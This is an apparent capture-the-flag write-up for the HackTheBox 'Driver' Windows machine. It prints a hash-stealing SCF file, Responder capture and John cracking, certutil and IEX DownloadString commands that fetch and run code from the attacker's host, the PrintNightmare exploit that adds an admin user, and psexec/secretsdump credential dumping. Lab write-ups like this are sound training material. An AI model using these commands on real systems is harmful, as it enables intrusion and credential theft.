Driver HackTheBox WalkThrough

This is Driver HackTheBox machine walkthrough. In this writeup I have demonstrated step-by-step how I rooted Driver HTB machine. Before starting let us know something about this machine. It is a Windows OS box with IP address 10.10.11.106 and difficulty easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Driver machine by pinging its IP 10.10.11.106. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap for this task and the result is given below: –

Scanning

$ sudo nmap -p- --min-rate 10000 -oN nmap-alltcp.nmap 10.10.11.106

$ sudo nmap -p 80,135,445,5985 -sV -sC -oA nmap-tcpscripts.nmap 10.10.11.106

Full port scan with $ nmap revealed 4 ports as open. Microsoft IIS 10.0 web server is running over port 80. Since version of web server software is 10.0 which is the latest one so there is no any potential vulnerability present in it. Msrpc is running on port 135, SMB service is running on port 445 and Microsoft HTTPAPI service is running over port 5985. Since port 5985 is open, we can connect to driver machine remotely using this port once we get any user credential because this port is used for Remote Management in windows OS.

I began my enumeration from port 445. Tried to establish null session on port 445 but got ACCESS_DENIED message. Then on going to URL http://10.10.11.106 found a login page. Just tried some default credential like admin : admin and it worked. Logged in successfully into the website. It is a Firmware Update Center where user upload their firmware and the uploaded file is tested by driver testing team. One thing is clear by this line is that, whenever we will upload any file to this site that will be opened by the testing team. 

But before going further let us add driver.htb to out hosts. Hosts file is present in the directory /etc/.

Hosts File After Modification

$ cat /etc/hosts

Ongoing to the URL http://driver.htb/fw_up.php found a file upload functionality. Since the application is made up of php I tried to upload a php web shell but it did not execute. Tried to upload other extension files like aspx, exe, asp, etc., but none of them execute. Performed directory bruteforce on URL http://driver.htb and nothing useful found. After some googling found that we can perform SCF File Attacks when SMB port is open and file share are available. For more info about this attack check this blog post at PentestLab. To perform SCF File Attack follow the given steps:

1.  Firstly create a file with the following contents and save the file starting with @ (adding the @ symbol in front of the filename will place the share.scf on the top of the share drive) with .scf file extension (don’t forget to replace IP address with your tun0 IP in below code).

[Shell]Command=2IconFile=\\10.10.17.97\info.ico[Taskbar]Command=ToggleDesktop

$ cat @share.scf

2. Start $ responder to listen on your tun0 interface

$ sudo responder -wrf --lm -v -I tun0

3. At last upload @share.scf file at http://driver.htb/fw_up.php.

Since our uploaded file is opened by driver user so when it opens @share.scf it tries to connect to SMB share at IP 10.10.17.97 (my local IP) to access info.ico file. As there is no any file share present at my local IP, $ responder will respond to the authentication request made by driver user and will prove itself that it is the SMB server which driver user is trying to connect. During authentication responder will capture the authentication hash and dump on the screen. I tried to follow all the above steps and got NTLMv2 Hash.

We can again confirm the type of hash using $ hashid tool.

Identifying the Hash

$ hashid 'tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000'

Let us crack the hash using John the Ripper [an offline password cracker] tool. You can also use other offline cracker like $ hashcat.

Cracking Hash

Cheat sheet of John can be found at Pentestmonkey.

$ echo "tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000" > hash.txt

$ john --format=netntlmv2 hash.txt /usr/share/wordlists/rockyou.txt

$ john --format=netntlmv2 hash.txt /usr/share/wordlists/rockyou.txt –show

The cracked hash is liltony. So, we have the credential tony : liltony. Since port 5985 is open we can use evil-winrm to remotely connect to driver machine using this credential. Let us connect and get user shell.

Getting User Shell

$ evil-winrm -u'tony' -p'liltony' -P5985 -i 10.10.11.106

$ whoami

$ hostname

We have successfully connected to Driver machine. Let us capture user flag.

Capture User Flag

$ type C:\Users\tony\Desktop\user.txt

Privilege Escalation

To escalate the privilege to admin we have to first find a privilege escalation vector using which we can perform privilege escalation. We can use some post exploitation enumeration script for finding PrivEsc vector. Check this link if you need more information about a bunch of post exploitation tools.

Finding PrivEsc Vector

I have used winpeas this time. It is the best Post Exploitation Enumeration tool which can be found at this repo. Before we run winpeas on driver machine we need to first transfer it from our Kali machine to driver machine. Follow below steps to run winpeas on driver machine.

On Kali Machine

$ wget https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASx64.exe

$ python3 -m http.server 9001

On Driver Machine

$ cd C:\Temp\

$ certutil.exe -urlcache -split -f "http://10.10.17.97:9001/winPEASx64.exe" winPEASx64.exe                                                            

$ ./winPEASx64.exe

Winpeas found spoolsv service is running locally. For more info about this service check this article.

Since spoolsv service is related to printer and the name of this HTB box is Driver this remind me about the Windows Print Spooler Remote Code Execution Vulnerability whose patch was released by Microsoft on 1st July 2021. The name of the exploit was PrintNightmare which can be used to perform Remote Code Execution on windows OS running Windows 10, Windows Server 2016 and almost all versions were vulnerable. Check the complete information about this vulnerability on Microsoft site. A very good article on how to exploit this vulnerability is written by 0xdf. Check this article by him.

When I tried to exploit this vulnerability, I could easily get admin shell. So here our potential privilege escalation vector is Privilege Escalation via Vulnerable Service Version.

Note: This exploit will work only if spoolsv service is running otherwise it will give error something like “Failed to get current driver lists”. If you don’t see spoolsv service then you need to reset the machine.

You can also use command $ ps | findstr "spoolsv" to find the spoolsv service.

Performing Privilege Escalation

To perform privilege escalation and getting admin shell follow the given steps.

On Kali Machine

$ git clone https://github.com/calebstewart/CVE-2021-1675

$ cd CVE-2021-1675/

$ echo "Invoke-Nightmare -NewUser 'newadmin' -NewPassword 'SuperSecurePassword'">>CVE-2021-1675.ps1

$ python3 -m http.server 9001

On Driver Machine

$ IEX(New-Object Net.WebClient).DownloadString("http://10.10.17.97:9001/CVE-2021-1675.ps1")

The above exploit will add a new user newadmin with password SuperSecurePassword and also adds this user to local admin group. We can check the list of all the admin accounts in Administrators group using the following command.

$ net localgroup administrators

Getting Admin Shell

Since we have admin credential therefore, we can now access the SMB shares which is present at port 445 and also have write permission on $C drive of Driver machine. Now we can use psexec.py module of Impacket to get admin shell. PsExec is a remote managing tool similar as SSH in Linux. Since port 5985 is open so we can also use $ evil-winrm using the credential newadmin : SuperSecurePassword to connect to Driver machine.

$ impacket-psexec [email protected]

~SuperSecurePassword

We are NT Authority\System now let us grab root flag.

Capture Root Flag

$ type C:\Users\Administrator\Desktop\root.txt

Dumping Admin Hash

$ impacket-secretsdump [email protected]

~SuperSecurePassword

This was how I rooted Driver HackTheBox machine. Learnt a lot after solving this box. Hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected].